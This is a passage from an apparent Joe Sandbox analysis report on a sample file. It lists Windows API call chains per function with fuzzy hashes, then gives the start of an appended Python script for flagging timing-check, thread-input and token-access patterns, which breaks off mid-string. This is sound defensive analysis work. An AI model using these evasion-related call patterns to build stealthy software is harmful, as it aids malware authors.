                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00975816
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend_wcslen
                                                                    • String ID:
                                                                    • API String ID: 455545452-0
                                                                    • Opcode ID: aa7f5b34a3cd3efd689a57e2e7adf04140d3166ec5afcb51b215f7e255bf7128
                                                                    • Instruction ID: efe0420b01e764d04e5245719990b3ce7cbbdf5bad128238048a8c26e3d98494
                                                                    • Opcode Fuzzy Hash: aa7f5b34a3cd3efd689a57e2e7adf04140d3166ec5afcb51b215f7e255bf7128
                                                                    • Instruction Fuzzy Hash: 1C11D373A006089ADF609F61CC85AEE77ACEF50764F51C42AFA1DD6081E7B4DA80CB60
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 691c56d1b9f67975dd4181d5746375ca0a92c5bb13d612fcc822139cc490ae09
                                                                    • Instruction ID: a8b39d6e58f755a5e5d27de30427aa0e6f47725530b29feac309c3bf7014be15
                                                                    • Opcode Fuzzy Hash: 691c56d1b9f67975dd4181d5746375ca0a92c5bb13d612fcc822139cc490ae09
                                                                    • Instruction Fuzzy Hash: 100162B631961E7FF61126787CC1FA7671DDF813B8B340729F635551D2DB608C905160
                                                                    APIs
                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00941A47
                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00941A59
                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00941A6F
                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00941A8A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID:
                                                                    • API String ID: 3850602802-0
                                                                    • Opcode ID: 77a23dfa78c7c64420961047ebf48eab09e82899bd551fec170d9b9f6f91bf66
                                                                    • Instruction ID: f5e2fff707b31e11993dae7f4fedebc56b1f99e6e61a399b769761c2b77bd29d
                                                                    • Opcode Fuzzy Hash: 77a23dfa78c7c64420961047ebf48eab09e82899bd551fec170d9b9f6f91bf66
                                                                    • Instruction Fuzzy Hash: 5611397AD01219FFEF10DBA4CD85FADBB78EB08750F200495EA04B7290D671AE90DB94
                                                                    APIs
                                                                    • GetCurrentThreadId.KERNEL32 ref: 0094E1FD
                                                                    • MessageBoxW.USER32(?,?,?,?), ref: 0094E230
                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0094E246
                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0094E24D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                    • String ID:
                                                                    • API String ID: 2880819207-0
                                                                    • Opcode ID: 74b61ef5c8fa9472da737143d60e93a966090ea6b75862f0afb196b87e573966
                                                                    • Instruction ID: 8d1c0cae9255499256d2bcb6e09085ff97e937d7e828686580589d5aa7e7f862
                                                                    • Opcode Fuzzy Hash: 74b61ef5c8fa9472da737143d60e93a966090ea6b75862f0afb196b87e573966
                                                                    • Instruction Fuzzy Hash: 43112BB6918214BFC7019FA89C09EAF7FECAB45320F404329F825E3290D6B0CD0097A0
                                                                    APIs
                                                                    • CreateThread.KERNEL32(00000000,?,0090CFF9,00000000,00000004,00000000), ref: 0090D218
                                                                    • GetLastError.KERNEL32 ref: 0090D224
                                                                    • __dosmaperr.LIBCMT ref: 0090D22B
                                                                    • ResumeThread.KERNEL32(00000000), ref: 0090D249
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                    • String ID:
                                                                    • API String ID: 173952441-0
                                                                    • Opcode ID: c599bee6fbadac923d0c820bb22fb3065eaf4e577988f5274e0a4c7a26a0fd65
                                                                    • Instruction ID: a5ff52068f46bc04b82b962676f3263f122d43287ea961e30d86e02722f6d906
                                                                    • Opcode Fuzzy Hash: c599bee6fbadac923d0c820bb22fb3065eaf4e577988f5274e0a4c7a26a0fd65
                                                                    • Instruction Fuzzy Hash: 1101D27680A208BFDB216BE9DC09BAE7A6DDFC1730F100219F939961D0CF718941D7A0
                                                                    APIs
                                                                      • Part of subcall function 008F9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 008F9BB2
                                                                    • GetClientRect.USER32(?,?), ref: 00979F31
                                                                    • GetCursorPos.USER32(?), ref: 00979F3B
                                                                    • ScreenToClient.USER32(?,?), ref: 00979F46
                                                                    • DefDlgProcW.USER32(?,00000020,?,00000000,?,?,?), ref: 00979F7A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Client$CursorLongProcRectScreenWindow
                                                                    • String ID:
                                                                    • API String ID: 4127811313-0
                                                                    • Opcode ID: fd608cb53bff9cf97d7243a7ec6fdd651b0abcb144f5993f9946b8ba25ef21d0
                                                                    • Instruction ID: d841847a67108a2ea3112833f3fa147060fe00ce414e540553646dc330c17d71
                                                                    • Opcode Fuzzy Hash: fd608cb53bff9cf97d7243a7ec6fdd651b0abcb144f5993f9946b8ba25ef21d0
                                                                    • Instruction Fuzzy Hash: 27114572A0461AEBDB10EFA8D889AEE77B8FB45311F408455F905E3140D730BE81DBA1
                                                                    APIs
                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 008E604C
                                                                    • GetStockObject.GDI32(00000011), ref: 008E6060
                                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 008E606A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: CreateMessageObjectSendStockWindow
                                                                    • String ID:
                                                                    • API String ID: 3970641297-0
                                                                    • Opcode ID: 36c5b466e80631f0717e948035140b8669665fe0f6a6608aeab72586110585a9
                                                                    • Instruction ID: 969b4dd45832101dfc91160f4e4195fe40922a0464c90db3869f0ec15f0b6223
                                                                    • Opcode Fuzzy Hash: 36c5b466e80631f0717e948035140b8669665fe0f6a6608aeab72586110585a9
                                                                    • Instruction Fuzzy Hash: F711A1B3105958BFEF125F959C44EEA7B69FF293A4F000215FE04A2010D732ACA0EB90
                                                                    APIs
                                                                    • ___BuildCatchObject.LIBVCRUNTIME ref: 00903B56
                                                                      • Part of subcall function 00903AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00903AD2
                                                                      • Part of subcall function 00903AA3: ___AdjustPointer.LIBCMT ref: 00903AED
                                                                    • _UnwindNestedFrames.LIBCMT ref: 00903B6B
                                                                    • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00903B7C
                                                                    • CallCatchBlock.LIBVCRUNTIME ref: 00903BA4
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                    • String ID:
                                                                    • API String ID: 737400349-0
                                                                    • Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                                    • Instruction ID: d9d04a05a558a5d4e87661a111384c4cb81ed2440adf1066f8ed85861bd27759
                                                                    • Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                                    • Instruction Fuzzy Hash: 70012972100148BFDF126E95CC42EEB3B7EEF88758F048414FE48A6161C732E961EBA0
                                                                    APIs
                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,008E13C6,00000000,00000000,?,0091301A,008E13C6,00000000,00000000,00000000,?,0091328B,00000006,FlsSetValue), ref: 009130A5
                                                                    • GetLastError.KERNEL32(?,0091301A,008E13C6,00000000,00000000,00000000,?,0091328B,00000006,FlsSetValue,00982290,FlsSetValue,00000000,00000364,?,00912E46), ref: 009130B1
                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0091301A,008E13C6,00000000,00000000,00000000,?,0091328B,00000006,FlsSetValue,00982290,FlsSetValue,00000000), ref: 009130BF
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: LibraryLoad$ErrorLast
                                                                    • String ID:
                                                                    • API String ID: 3177248105-0
                                                                    • Opcode ID: 29e6550fc0d54c0339ffa8e1abbba3386389db7326e54111efbbfcdf5170557e
                                                                    • Instruction ID: db82cb617d733fa7a5555d2a8378b7da7ad4efa039104b8ae15fd85f9583809e
                                                                    • Opcode Fuzzy Hash: 29e6550fc0d54c0339ffa8e1abbba3386389db7326e54111efbbfcdf5170557e
                                                                    • Instruction Fuzzy Hash: C7012B7331962AABCB314B799C449A77BECAF49B71B118734F919E3140DB21DA81C7E0
                                                                    APIs
                                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 0094747F
                                                                    • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00947497
                                                                    • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 009474AC
                                                                    • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 009474CA
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Type$Register$FileLoadModuleNameUser
                                                                    • String ID:
                                                                    • API String ID: 1352324309-0
                                                                    • Opcode ID: 6f9005748234e25b60398e92187eb6e20a981398e2872e9f501820f38fe52d43
                                                                    • Instruction ID: e9ab7488021e97411408b474f21860a289b0ef01eedf4359d7cba6696f790b83
                                                                    • Opcode Fuzzy Hash: 6f9005748234e25b60398e92187eb6e20a981398e2872e9f501820f38fe52d43
                                                                    • Instruction Fuzzy Hash: 5E1161B52093199BE7208F94DC09FA2BBFDEB00B04F10896DA65AD6161D774E944DBA0
                                                                    APIs
                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0094ACD3,?,00008000), ref: 0094B0C4
                                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0094ACD3,?,00008000), ref: 0094B0E9
                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0094ACD3,?,00008000), ref: 0094B0F3
                                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0094ACD3,?,00008000), ref: 0094B126
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: CounterPerformanceQuerySleep
                                                                    • String ID:
                                                                    • API String ID: 2875609808-0
                                                                    • Opcode ID: 1eccaa258968f780cb998c711c3ed4cb51abc13aa4ee7afc22706c241d0e6de1
                                                                    • Instruction ID: e7bcf4dd96550cc6863fbca9265d4c7b83b437186a195b133a7c2326c6581659
                                                                    • Opcode Fuzzy Hash: 1eccaa258968f780cb998c711c3ed4cb51abc13aa4ee7afc22706c241d0e6de1
                                                                    • Instruction Fuzzy Hash: 9A11AD71C0852CEBCF04AFE4E9A8AEEBB78FF4D311F004499D941B2285CB308650DB51
                                                                    APIs
                                                                    • GetWindowRect.USER32(?,?), ref: 00977E33
                                                                    • ScreenToClient.USER32(?,?), ref: 00977E4B
                                                                    • ScreenToClient.USER32(?,?), ref: 00977E6F
                                                                    • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00977E8A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: ClientRectScreen$InvalidateWindow
                                                                    • String ID:
                                                                    • API String ID: 357397906-0
                                                                    • Opcode ID: 26e77a391f56946a152d0babf0b5b19927e8de22b9c844ee19de29d24305cc53
                                                                    • Instruction ID: 5feba157858a008cf0d0785e6989e602100e1821c0db62e1aa9fac45b43ae609
                                                                    • Opcode Fuzzy Hash: 26e77a391f56946a152d0babf0b5b19927e8de22b9c844ee19de29d24305cc53
                                                                    • Instruction Fuzzy Hash: 831144BAD0420AAFDB41DF98D8849EEBBF9FF08310F509056E915E3210D735AA94DF51
                                                                    APIs
                                                                    • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00942DC5
                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 00942DD6
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00942DDD
                                                                    • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00942DE4
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                    • String ID:
                                                                    • API String ID: 2710830443-0
                                                                    • Opcode ID: 482d82fc2d1a954014926f34eba1a0bad468708706c221aabfde6a98da35f7b7
                                                                    • Instruction ID: 20428ff2a092635a595a1d1f9038cf9512ae4f15cdba86cb46be5428b6586653
                                                                    • Opcode Fuzzy Hash: 482d82fc2d1a954014926f34eba1a0bad468708706c221aabfde6a98da35f7b7
                                                                    • Instruction Fuzzy Hash: B8E092B2529224BBD7201B729C4DFEB7E6CFF82BB1F800019F109E10809AA4C880D6B0
                                                                    APIs
                                                                      • Part of subcall function 008F9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 008F9693
                                                                      • Part of subcall function 008F9639: SelectObject.GDI32(?,00000000), ref: 008F96A2
                                                                      • Part of subcall function 008F9639: BeginPath.GDI32(?), ref: 008F96B9
                                                                      • Part of subcall function 008F9639: SelectObject.GDI32(?,00000000), ref: 008F96E2
                                                                    • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00978887
                                                                    • LineTo.GDI32(?,?,?), ref: 00978894
                                                                    • EndPath.GDI32(?), ref: 009788A4
                                                                    • StrokePath.GDI32(?), ref: 009788B2
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                    • String ID:
                                                                    • API String ID: 1539411459-0
                                                                    • Opcode ID: b602c19602a10607185733aa5eda29d07ef79c2583ba919e58263344f6aebd99
                                                                    • Instruction ID: 2ce8e17e0c0a71e6095e0c9e4381a31837c61dbc45ebbdf8fcf10d8dd9f7f365
                                                                    • Opcode Fuzzy Hash: b602c19602a10607185733aa5eda29d07ef79c2583ba919e58263344f6aebd99
                                                                    • Instruction Fuzzy Hash: B5F09A36059258BADB122F94AC0DFCA3E19AF06310F408104FA25610E1C7740550EBE6
                                                                    APIs
                                                                    • GetSysColor.USER32(00000008), ref: 008F98CC
                                                                    • SetTextColor.GDI32(?,?), ref: 008F98D6
                                                                    • SetBkMode.GDI32(?,00000001), ref: 008F98E9
                                                                    • GetStockObject.GDI32(00000005), ref: 008F98F1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Color$ModeObjectStockText
                                                                    • String ID:
                                                                    • API String ID: 4037423528-0
                                                                    • Opcode ID: 384775dff2d15ae40770c216436728a2649d256ce8ad7197c52e85ebb16e6cac
                                                                    • Instruction ID: 9440b6df6b07719b5f335c4e821fb14f0e4041b7d202c4b4ce2c5d44ea3d5b66
                                                                    • Opcode Fuzzy Hash: 384775dff2d15ae40770c216436728a2649d256ce8ad7197c52e85ebb16e6cac
                                                                    • Instruction Fuzzy Hash: 72E0657225C244ABDB215B74AC09BE87F51EB11335F14822DF6F9540E1C3714680AF10
                                                                    APIs
                                                                    • GetCurrentThread.KERNEL32 ref: 00941634
                                                                    • OpenThreadToken.ADVAPI32(00000000,?,?,?,009411D9), ref: 0094163B
                                                                    • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,009411D9), ref: 00941648
                                                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,009411D9), ref: 0094164F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentOpenProcessThreadToken
                                                                    • String ID:
                                                                    • API String ID: 3974789173-0
                                                                    • Opcode ID: a6062547add07b5abd5a1687ebe3db0f7a4f1341b1c78a228133821d707b7347
                                                                    • Instruction ID: 9299f3da4c34e6fc6559056ae48c21ac7cc47af842791698b2bcad03bf39ea8d
                                                                    • Opcode Fuzzy Hash: a6062547add07b5abd5a1687ebe3db0f7a4f1341b1c78a228133821d707b7347
                                                                    • Instruction Fuzzy Hash: 89E08CB3616211EBDB201FA0AE0DF863B7CAF44792F15880CF249E9090E73484C0DBA4
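The records above are raw per-function API chains; the ones an analyst stops at are the QueryPerformanceCounter/Sleep pair (the "execution timing" signature in the report header), the GetWindowThreadProcessId/AttachThreadInput chain, and the GetCurrentProcess/OpenProcessToken chain. The Python script below is an added example, not part of the Joe Sandbox report and not Joe Sandbox's own tooling: it parses records in exactly this plain-text layout into call chains and runs a small hand-written rule set over them. The sample excerpt is constructed from the records on this page, the rule set is the example's own, and the reading of the `00000028` stack slot printed for GetCurrentProcess as the DesiredAccess pushed for the following OpenProcessToken call is an inference from the push order that the report itself does not state.

```python
"""Triage helper for the plain-text 'APIs' function records of a Joe Sandbox
report.  Added example: not part of the report and not Joe Sandbox tooling."""
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample in the report's own layout: four of the records shown
# above, trimmed to the lines the parser reads.
SAMPLE = """\
APIs
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0094ACD3,?,00008000), ref: 0094B0C4
• Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0094ACD3,?,00008000), ref: 0094B0E9
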